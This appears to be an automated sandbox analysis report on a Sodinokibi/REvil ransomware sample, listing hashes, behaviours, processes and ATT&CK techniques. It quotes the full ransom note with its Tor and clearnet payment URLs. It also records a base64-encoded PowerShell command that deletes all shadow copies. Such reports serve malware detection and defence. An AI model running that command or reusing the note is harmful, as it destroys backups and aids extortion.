Analysis

  • max time kernel
    169s
  • max time network
    181s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 02:16

General

  • Target

    38ad0cfb52e6c5bc1938919af2e28f92276f4b93e3b3b047ea561a49ca4d811d.exe

  • Size

    179KB

  • MD5

    caab803a7c12918ff5dc44a35589906c

  • SHA1

    10a749fca7313acfc08e437e02348202056501ca

  • SHA256

    38ad0cfb52e6c5bc1938919af2e28f92276f4b93e3b3b047ea561a49ca4d811d

  • SHA512

    0b06a14757dcc718ebaf1d7427daecd576e2688441ef97e00ba785f0e6283f9d16b9650348d1496132c5fa9670058bd03244e62c48fd14c688589ab55da30671

Score
10/10

Malware Config

Extracted

Path

C:\48557gg6b-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 48557gg6b. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CDE368758C84D53 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/3CDE368758C84D53 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: wp6WgRFZpTgCXK2tM4K9tC3lx0w0EmtY2tRlsj/weuf0ilUwT2dkzhdnznOsFoSF /xshB4AJhTrCRyNOllVisnYQcGjHLuTkFQtcxG6D1rb3Gd64t/vgLs+Tzn9j5CKG NSWWy79cFApQ9rFR1f/FqNOesMsjJgcNd9sEn5xdj1Rf66NZb9OZKgeieaqoMGK3 hCPKV9zZgj4i+8vA08soWeJhZHKwKO5ht2oT1a7MHK6r9FdNCw0HyTeUN9go9PBN KFFVlHLmLJZr8gRTG9rJXIRWwJGZ/GFO3MZBDVM879bznx0KEzcOnk3EyLk+A6vh uN9d44uFaZyKRzgOS5DZL9x88AOTrDYjlEvrYljye/NbueZDPwpn3zdbaAHwj7iz Fmp7/tRn+/bsak67ib0eBitaKwECq9GO6+Ygq1O7gHVsNJEd3gryiJuhG5WwlJBg KCxCMPPKIqk8kyayCAn/wv5JUz8viuFJ6QufWEFEUPZveUuphAqhsZYpT1YPzk9J UNzcrLnNlXEi7DWrhrWXa/AOaOpaVUKL7qDHUd+akZQSdFoEAXUqOYZ0aSWfZq8W 8FEvRwpao1sTRwN381pQn+B695TVnAyIu84z+wQTBWFcZFxLGaF1MijoSnt3xs4q VqTz0B+d11X/32OW9rMCuWAKe1N7ZIfKbQ2U1i1x2BsGJg1XnJrHgVaT4l90HhMi umOpyEuQjTywmz9OUkTc0oTa7X2JaHsBhxEkFBSqPAi6F/X+/TE87H+AorNoi2Uu PqmiMMnFG2jyDtq9xvv9qDGuCHPmEWfMj/Ocn5V+m+XW5rJURIlJVaV872qJAUsR NN9HCK4KHqgPWsVcqRXpKQUy/XFREY+0Js+oMiWiud9eaD5otjshMzorCtXjrG9o aD2Y8aOzizmh0cBTJJGy75CDGjqCO45hh3Mtsx4YaT+rEaSXxjdhoxoMYRgDKfmR gb7LY4fKAZvMJ9hecxh0w846KDQBfOZAfJjxbPf8aQO1t8aYTna3y6cmASRbfcg7 L/hIGW02wtjl2I5dmJlRjOQKkUOJn4ewDeAnM5WPLv0aow6e8dZjpOWnJDad2OR5 +anYxIfIz4bAjQZ5iRKBcNvC9zAPjvrAgyHJYOnT0MOByYrKnhfU4IkMQ55fmw== Extension name: 48557gg6b ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CDE368758C84D53

http://decryptor.top/3CDE368758C84D53

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38ad0cfb52e6c5bc1938919af2e28f92276f4b93e3b3b047ea561a49ca4d811d.exe
    "C:\Users\Admin\AppData\Local\Temp\38ad0cfb52e6c5bc1938919af2e28f92276f4b93e3b3b047ea561a49ca4d811d.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1212
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3100
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2228

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1212-120-0x000001944EE90000-0x000001944EF90000-memory.dmp
      Filesize

      1024KB

    • memory/1212-121-0x000001944EE90000-0x000001944EF90000-memory.dmp
      Filesize

      1024KB

    • memory/1212-122-0x000001944EFD0000-0x000001944EFF2000-memory.dmp
      Filesize

      136KB

    • memory/1212-125-0x0000019468F50000-0x0000019468FC6000-memory.dmp
      Filesize

      472KB